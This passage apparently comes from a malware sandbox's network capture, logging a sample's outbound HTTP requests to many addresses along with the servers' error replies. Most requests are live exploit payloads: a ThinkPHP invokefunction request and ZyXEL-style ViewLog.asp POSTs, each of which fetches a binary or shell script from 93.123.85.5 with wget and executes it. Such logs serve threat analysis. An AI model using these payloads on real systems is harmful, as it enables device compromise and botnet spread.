                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              803192.168.2.2355486112.184.109.11780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.467514992 CET15559OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              804192.168.2.2339504112.126.243.6980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.530370951 CET15561OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:05.846366882 CET15662INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:51 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              805192.168.2.233779494.158.52.1818080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.749160051 CET15626OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              806192.168.2.235582494.29.204.1968080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:05.759763002 CET15650OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:06.168200970 CET15679INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              807192.168.2.233963231.136.218.2258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:06.468290091 CET15684OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:07.460791111 CET15801OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:09.444525957 CET16053OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:13.635982037 CET16553OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.570959091 CET17553OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:37.440857887 CET19509OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:10.716476917 CET20706OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              808192.168.2.234850662.29.80.688080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:06.492665052 CET15685OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              80962.60.144.2408080192.168.2.2341454
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:06.759407043 CET15710INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Cache-Control: private
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 22:20:06 GMT


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              81192.168.2.235636094.123.244.378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:21.093130112 CET2703OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              810192.168.2.233415894.199.187.768080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.149954081 CET15911OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.438267946 CET15922INHTTP/1.1 307 Temporary Redirect
                                                              Date: Mon, 13 Nov 2023 21:20:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 152
                                                              Connection: close
                                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              811192.168.2.2345098112.126.218.4380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.172683954 CET15914OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:08.487967968 CET15924INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:15 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              812192.168.2.2333896112.124.11.18380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.172790051 CET15915OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:08.488230944 CET15925INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              813192.168.2.2351158112.197.189.580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.209124088 CET15917OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:08.560534954 CET15930INHTTP/1.0 400 Bad Request
                                                              Date: Tue, 14 Nov 2023 04:20:08 GMT
                                                              Server: Boa/0.94.14rc21
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Type: text/html; charset=ISO-8859-1
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              814192.168.2.235881895.86.117.658080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.218184948 CET15919OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              815192.168.2.2356320112.126.240.13980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.487535000 CET15924OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:08.802459955 CET15957INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:09 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              816192.168.2.234842685.14.233.1968080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.511799097 CET15926OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.805720091 CET15964INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 345
                                                              Date: Mon, 13 Nov 2023 21:20:08 GMT
                                                              Server: lighttpd/1.4.45
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              817192.168.2.235350685.215.92.1898080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:08.528546095 CET15927OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.839975119 CET16029INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:08 GMT
                                                              Server: Apache
                                                              Content-Length: 126
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
